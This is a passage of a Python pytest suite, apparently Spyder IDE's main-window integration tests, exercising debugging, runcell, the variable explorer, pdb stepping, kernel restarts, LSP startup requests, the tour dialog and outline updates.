code_editor.completions_response_signal):
code_editor.go_to_definition_from_cursor()
def _get_filenames():
return [osp.basename(f) for f in main_window.editor.get_filenames()]
qtbot.waitUntil(lambda: 'QtCore.py' in _get_filenames())
assert 'QtCore.py' in _get_filenames()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin' and not PY2,
reason="It times out on macOS/PY3")
def test_debug_unsaved_file(main_window, qtbot):
"""Test that we can debug an unsaved file."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
control = shell._control
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text('print(0)\nprint(1)\nprint(2)')
# Set breakpoint
code_editor.debugger.toogle_breakpoint(line_number=2)
qtbot.wait(500)
# Start debugging
qtbot.mouseClick(debug_button, Qt.LeftButton)
# There is a breakpoint, so it should continue
qtbot.waitUntil(
lambda: '!continue' in shell._control.toPlainText())
qtbot.waitUntil(
lambda: "1---> 2 print(1)" in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [True, False])
def test_runcell(main_window, qtbot, tmpdir, debug):
"""Test the runcell command."""
# Write code with a cell to a file
code = u"result = 10; fname = __file__"
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
if debug:
function = 'debugcell'
else:
function = 'runcell'
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute(function + u"(0, r'{}')".format(to_text_string(p)))
if debug:
# Reach the 'name' input
shell.pdb_execute('!c')
qtbot.wait(1000)
# Verify that the `result` variable is defined
assert shell.get_value('result') == 10
# Verify that the `fname` variable is `cell-test.py`
assert "cell-test.py" in shell.get_value('fname')
# Verify that the `__file__` variable is undefined
try:
shell.get_value('__file__')
assert False
except KeyError:
pass
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_leading_indent(main_window, qtbot, tmpdir):
"""Test the runcell command with leading indent."""
# Write code with a cell to a file
code = ("def a():\n return\nif __name__ == '__main__':\n"
"# %%\n print(1233 + 1)\n")
p = tmpdir.join("cell-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(1, r'{}')".format(to_text_string(p)))
assert "1234" in shell._control.toPlainText()
assert "This is not valid Python code" not in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_rename(main_window, qtbot, tmpdir):
"""
Test renaming a variable.
Regression test for spyder-ide/spyder#10735
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_rename").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Rename one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.rename_item(new_name='arr2')
# Wait until all objects have updated in the variable explorer
def data(cm, i, j):
return cm.data(cm.index(i, j))
qtbot.waitUntil(lambda: data(nsb.editor.model, 1, 0) == 'arr2',
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr2'
assert data(nsb.editor.model, 2, 0) == 'li'
assert data(nsb.editor.model, 3, 0) == 's'
# ---- Run file again ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 5,
timeout=EVAL_TIMEOUT)
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'arr'
assert data(nsb.editor.model, 2, 0) == 'arr2'
assert data(nsb.editor.model, 3, 0) == 'li'
assert data(nsb.editor.model, 4, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_remove(main_window, qtbot, tmpdir):
"""
Test removing a variable.
Regression test for spyder-ide/spyder#10709
"""
# ---- Setup ----
p = (tmpdir.mkdir(u"varexp_remove").join(u"script.py"))
filepath = to_text_string(p)
shutil.copyfile(osp.join(LOCATION, 'script.py'), filepath)
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Load test file
main_window.editor.load(filepath)
# Move to the editor's first line
code_editor = main_window.editor.get_focus_widget()
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
# Get a reference to the namespace browser widget
nsb = main_window.variableexplorer.current_widget()
# ---- Run file ----
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_F5)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 4,
timeout=EVAL_TIMEOUT)
# Remove one element
nsb.editor.setCurrentIndex(nsb.editor.model.index(1, 0))
nsb.editor.remove_item(force=True)
# Wait until all objects have appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.model.rowCount() == 3,
timeout=EVAL_TIMEOUT)
def data(cm, i, j):
assert cm.rowCount() == 3
return cm.data(cm.index(i, j))
assert data(nsb.editor.model, 0, 0) == 'a'
assert data(nsb.editor.model, 1, 0) == 'li'
assert data(nsb.editor.model, 2, 0) == 's'
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_refresh(main_window, qtbot):
"""
Test refreshing the variable explorer while the kernel is executing.
"""
# Create object
shell = main_window.ipyconsole.get_current_shellwidget()
control = main_window.ipyconsole.get_widget().get_focus_widget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
shell.execute("import time\n"
"for i in range(10):\n"
" print('i = {}'.format(i))\n"
" time.sleep(.1)\n")
qtbot.waitUntil(lambda: "i = 0" in control.toPlainText())
qtbot.wait(300)
# Get value object
nsb = main_window.variableexplorer.current_widget()
# This is empty
assert len(nsb.editor.source_model._data) == 0
nsb.refresh_table()
qtbot.waitUntil(lambda: len(nsb.editor.source_model._data) == 1)
assert 0 < int(nsb.editor.source_model._data['i']['view']) < 9
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="Fails on macOS")
def test_runcell_edge_cases(main_window, qtbot, tmpdir):
"""
Test if runcell works with an unnamed cell at the top of the file
and with an empty cell.
"""
# Write code with a cell to a file
code = ('if True:\n'
' a = 1\n'
'#%%')
p = tmpdir.join("test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
code_editor = main_window.editor.get_focus_widget()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(1000)
assert 'runcell(0' in shell._control.toPlainText()
assert 'cell is empty' not in shell._control.toPlainText()
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert 'runcell(1' in shell._control.toPlainText()
assert 'Error' not in shell._control.toPlainText()
assert 'cell is empty' in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_runcell_pdb(main_window, qtbot):
"""Test the runcell command in pdb."""
# Write code with a cell to a file
code = ("if 'abba' in dir():\n"
" print('abba {}'.format(abba))\n"
"else:\n"
" def foo():\n"
" abba = 27\n"
" foo()\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Start debugging
with qtbot.waitSignal(shell.executed, timeout=10000):
qtbot.mouseClick(debug_button, Qt.LeftButton)
for key in ['!n', '!n', '!s', '!n', '!n']:
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(shell._control, key)
qtbot.keyClick(shell._control, Qt.Key_Enter)
assert shell.get_value('abba') == 27
code_editor.setFocus()
# call runcell
with qtbot.waitSignal(shell.executed):
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
assert "runcell" in shell._control.toPlainText()
# Make sure the local variables are detected
assert "abba 27" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
"debug", [False, True])
def test_runcell_cache(main_window, qtbot, debug):
"""Test the runcell command cache."""
# Write code with a cell to a file
code = ("import time\n"
"time.sleep(.5)\n"
"# %%\n"
"print('Done')\n")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
if debug:
# Start debugging
with qtbot.waitSignal(shell.executed):
shell.execute("%debug print()")
# Run the two cells
code_editor.setFocus()
code_editor.move_cursor(0)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(100)
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.wait(500)
qtbot.waitUntil(lambda: "Done" in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Works reliably on Linux")
def test_path_manager_updates_clients(qtbot, main_window, tmpdir):
"""Check that on path manager updates, consoles correctly update."""
main_window.show_path_manager()
dlg = main_window._path_manager
test_folder = 'foo-spam-bar-123'
folder = str(tmpdir.mkdir(test_folder))
dlg.add_path(folder)
qtbot.waitUntil(lambda: dlg.button_ok.isEnabled(), timeout=EVAL_TIMEOUT)
with qtbot.waitSignal(dlg.sig_path_changed, timeout=EVAL_TIMEOUT):
dlg.button_ok.animateClick()
cmd = 'import sys;print(sys.path)'
# Check Spyder is updated
main_window.console.execute_lines(cmd)
syspath = main_window.console.get_sys_path()
assert folder in syspath
# Check clients are updated
count = 0
for client in main_window.ipyconsole.get_clients():
shell = client.shellwidget
if shell is not None:
syspath = shell.execute(cmd)
control = shell._control
# `shell.executed` signal was not working so we use waitUntil
qtbot.waitUntil(lambda: 'In [2]:' in control.toPlainText(),
timeout=EVAL_TIMEOUT)
assert test_folder in control.toPlainText()
count += 1
assert count >= 1
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' or sys.platform == 'darwin',
reason="It times out on macOS and Windows")
def test_pdb_key_leak(main_window, qtbot, tmpdir):
"""
Check that pdb notify spyder doesn't call
QApplication.processEvents(). If it does there might be keystoke leakage.
see #10834
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Replace QApplication.processEvents to make sure it is not called
super_processEvents = QApplication.processEvents
def processEvents():
processEvents.called = True
return super_processEvents()
processEvents.called = False
try:
QApplication.processEvents = processEvents
# Debug and open both files
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
# Wait until both files are open
qtbot.waitUntil(
lambda: osp.normpath(str(test_file)) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
qtbot.waitUntil(
lambda: str(test_file2) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
# Make sure the events are not processed.
assert not processEvents.called
finally:
QApplication.processEvents = super_processEvents
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS")
@pytest.mark.parametrize(
"where", [True, False])
def test_pdb_step(main_window, qtbot, tmpdir, where):
"""
Check that pdb notify Spyder only moves when a new line is reached.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
qtbot.wait(1000)
assert '1/0' in control.toPlainText()
# Debug and enter first file
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file)))
# Move to another file
main_window.editor.new()
qtbot.wait(100)
assert main_window.editor.get_current_editor().filename != str(test_file)
current_filename = main_window.editor.get_current_editor().filename
# Run a random command, make sure we don't move
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
assert current_filename == main_window.editor.get_current_editor().filename
# Go up and enter second file
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2)))
# Go back to first file
editor_stack = main_window.editor.get_current_editorstack()
index = editor_stack.has_filename(str(test_file))
assert index is not None
editor_stack.set_stack_index(index)
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
if where:
# go back to the second file with where
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!w')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we moved
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2))
else:
# Stay at the same place
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we didn't move
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Fails sometimes on macOS")
def test_runcell_after_restart(main_window, qtbot):
"""Test runcell after a kernel restart."""
# Write code to a file
code = "print('test_runcell_after_restart')"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# call runcell
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(
lambda: "test_runcell_after_restart" in shell._control.toPlainText())
# Make sure no errors are shown
assert "error" not in shell._control.toPlainText().lower()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="It fails sometimes on Linux")
@pytest.mark.parametrize(
"ipython", [True, False])
@pytest.mark.parametrize(
"test_cell_magic", [True, False])
def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic):
"""Test the runcell command with cell magic."""
# Write code with a cell to a file
write_file = tmpdir.mkdir("foo").join("bar.txt")
assert not osp.exists(to_text_string(write_file))
if test_cell_magic:
code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n"
else:
code = "\n\n%debug print()"
if ipython:
fn = "cell-test.ipy"
else:
fn = "cell-test.py"
p = tmpdir.join(fn)
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(0, r'{}')".format(to_text_string(p)))
control = main_window.ipyconsole.get_widget().get_focus_widget()
error_text = 'save this file with the .ipy extension'
try:
if ipython:
if test_cell_magic:
qtbot.waitUntil(
lambda: 'Writing' in control.toPlainText())
# Verify that the code was executed
assert osp.exists(to_text_string(write_file))
else:
qtbot.waitSignal(shell.executed)
assert error_text not in control.toPlainText()
else:
qtbot.waitUntil(lambda: error_text in control.toPlainText())
finally:
if osp.exists(to_text_string(write_file)):
os.remove(to_text_string(write_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_running_namespace(main_window, qtbot, tmpdir):
"""
Test that the running namespace is correctly sent when debugging in a
new namespace.
"""
code = ("def test(a):\n print('a:',a)\na = 10\ntest(5)")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=2)
# Write b in the namespace
with qtbot.waitSignal(shell.executed):
shell.execute('b = 10')
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['b']['view'] == '10'
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# b should not be there (running namespace) and the local a should be 5
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and
nsb.editor.source_model._data['a']['view'] == '5',
timeout=3000)
assert 'b' not in nsb.editor.source_model._data
assert nsb.editor.source_model._data['a']['view'] == '5'
qtbot.waitUntil(shell.is_waiting_pdb_input)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
# At the end, b should be back and a should be 10
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['a']['view'] == '10'
assert nsb.editor.source_model._data['b']['view'] == '10'
@pytest.mark.slow
@flaky(max_runs=3)
def test_post_mortem(main_window, qtbot, tmpdir):
"""Test post mortem works"""
# Check we can use custom complete for pdb
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
test_file = tmpdir.join('test.py')
test_file.write('raise RuntimeError\n')
with qtbot.waitSignal(shell.executed):
shell.execute(
"runfile(" + repr(str(test_file)) + ", post_mortem=True)")
assert "IPdb [" in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_unsaved_file_multiprocessing(main_window, qtbot):
"""Test that we can run an unsaved file with multiprocessing."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"import multiprocessing\n"
"import traceback\n"
'if __name__ is "__main__":\n'
" p = multiprocessing.Process(target=traceback.print_exc)\n"
" p.start()\n"
" p.join()\n"
)
# This code should run even on windows
# Start running
qtbot.mouseClick(run_button, Qt.LeftButton)
# Because multiprocessing is behaving strangly on windows, only some
# situations will work. This is one of these situations so it shouldn't
# be broken.
if os.name == 'nt':
qtbot.waitUntil(
lambda: "Warning: multiprocessing" in shell._control.toPlainText())
else:
# There is no exception, so the exception is None
qtbot.waitUntil(
lambda: 'None' in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_kernel_restart(main_window, qtbot):
"""
Test that the variable explorer is cleared after a kernel restart.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_reset(main_window, qtbot):
"""
Test that the variable explorer is cleared after triggering a
reset in the IPython console and variable explorer panes.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the variable explorer
nsb.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
# Create the variable again
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the console
shell.ipyclient.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_immediate_debug(main_window, qtbot):
"""
Check if we can enter debugging immediately
"""
shell = main_window.ipyconsole.get_current_shellwidget()
with qtbot.waitSignal(shell.executed, timeout=SHELL_TIMEOUT):
shell.execute("%debug print()")
@pytest.mark.slow
@flaky(max_runs=3)
def test_local_namespace(main_window, qtbot, tmpdir):
"""
Test that the local namespace is not reset.
This can happen if `frame.f_locals` is called on the current frame, as this
has the side effect of discarding the pdb locals.
"""
code = ("""
def hello():
test = 1
print('test ==', test)
hello()
""")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=4)
nsb = main_window.variableexplorer.current_widget()
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Check `test` has a value of 1
# Here we use "waitUntil" because `shell.executed` is emitted twice
# One at the beginning of the file, and once at the breakpoint
qtbot.waitUntil(lambda: 'test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '1',
timeout=3000)
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1")
# check value of test
with qtbot.waitSignal(shell.executed):
shell.execute("print('test =', test)")
assert "test = 2" in shell._control.toPlainText()
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1 + 1")
# do next
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!next")
assert "test == 3" in shell._control.toPlainText()
# Check the namespace browser is updated
assert ('test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '3')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
@pytest.mark.skipif(os.name == 'nt', reason='Times out on Windows')
def test_ordering_lsp_requests_at_startup(main_window, qtbot):
"""
Test the ordering of requests we send to the LSP at startup when a
project was left open during the previous session.
This is a regression test for spyder-ide/spyder#13351.
"""
# Wait until the LSP server is up.
code_editor = main_window.editor.get_current_editor()
qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000)
# Wait until the initial requests are sent to the server.
lsp = main_window.completions.get_provider('lsp')
python_client = lsp.clients['python']
qtbot.wait(5000)
expected_requests = [
'initialize',
'initialized',
'workspace/didChangeConfiguration',
'workspace/didChangeWorkspaceFolders',
'textDocument/didOpen',
]
skip_intermediate = {
'initialized': {'workspace/didChangeConfiguration'}
}
lsp_requests = python_client['instance']._requests
start_idx = lsp_requests.index((0, 'initialize'))
request_order = []
expected_iter = iter(expected_requests)
current_expected = next(expected_iter)
for i in range(start_idx, len(lsp_requests)):
if current_expected is None:
break
_, req_type = lsp_requests[i]
if req_type == current_expected:
request_order.append(req_type)
current_expected = next(expected_iter, None)
else:
skip_set = skip_intermediate.get(current_expected, set({}))
if req_type in skip_set:
continue
else:
assert req_type == current_expected
assert request_order == expected_requests
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('tours', 'show_tour_message', 2)}],
indirect=True)
def test_tour_message(main_window, qtbot):
"""Test that the tour message displays and sends users to the tour."""
# Wait until window setup is finished, which is when the message appears
tours = main_window.get_plugin(Plugins.Tours)
tour_dialog = tours.get_container()._tour_dialog
animated_tour = tours.get_container()._tour_widget
qtbot.waitSignal(main_window.sig_setup_finished, timeout=30000)
# Check that tour is shown automatically and manually show it
assert tours.get_conf('show_tour_message')
tours.show_tour_message(force=True)
# Wait for the message to appear
qtbot.waitUntil(lambda: bool(tour_dialog), timeout=5000)
qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=2000)
# Check that clicking dismiss hides the dialog and disables it
qtbot.mouseClick(tour_dialog.dismiss_button, Qt.LeftButton)
qtbot.waitUntil(lambda: not tour_dialog.isVisible(),
timeout=2000)
assert not tours.get_conf('show_tour_message')
# Confirm that calling show_tour_message() normally doesn't show it again
tours.show_tour_message()
qtbot.wait(2000)
assert not tour_dialog.isVisible()
# Ensure that it opens again with force=True
tours.show_tour_message(force=True)
qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=5000)
# Run the tour and confirm it's running and the dialog is closed
qtbot.mouseClick(tour_dialog.launch_tour_button, Qt.LeftButton)
qtbot.waitUntil(lambda: animated_tour.is_running, timeout=9000)
assert not tour_dialog.isVisible()
assert not tours.get_conf('show_tour_message')
# Close the tour
animated_tour.close_tour()
qtbot.waitUntil(lambda: not animated_tour.is_running, timeout=9000)
tour_dialog.hide()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_complex_project
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Only works on Linux")
def test_update_outline(main_window, qtbot, tmpdir):
"""
Test that files in the Outline pane are updated at startup and
after switching projects.
"""
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer.toggle_view_action.setChecked(True)
# Get Python editor trees
treewidget = outline_explorer.get_widget().treewidget
editors_py = [
editor for editor in treewidget.editor_ids.keys()
if editor.get_language() == 'Python'
]
# Wait a bit for trees to be filled
qtbot.wait(25000)
# Assert all Python editors are filled
assert all(
[
len(treewidget.editor_tree_cache[editor.get_id()]) == 4
for editor in editors_py
]
)
# Split editor
editorstack = main_window.editor.get_current_editorstack()
editorstack.sig_split_vertically.emit()
qtbot.wait(1000)
# Select file with no outline in split editorstack
editorstack = main_window.editor.get_current_editorstack()
editorstack.set_stack_index(2)
editor = editorstack.get_current_editor()
assert osp.splitext(editor.filename)[1] == '.txt'
assert editor.is_cloned
# Assert tree is empty
editor_tree = treewidget.current_editor
tree = treewidget.editor_tree_cache[editor_tree.get_id()]
assert len(tree) == 0
# Assert spinner is not shown
assert not outline_explorer.get_widget()._spinner.isSpinning()
# Hide outline from view
outline_explorer.toggle_view_action.setChecked(False)
# Remove content from first file
editorstack.set_stack_index(0)
editor = editorstack.get_current_editor()
editor.selectAll()
editor.cut()
editorstack.save(index=0)
# Assert outline was not updated
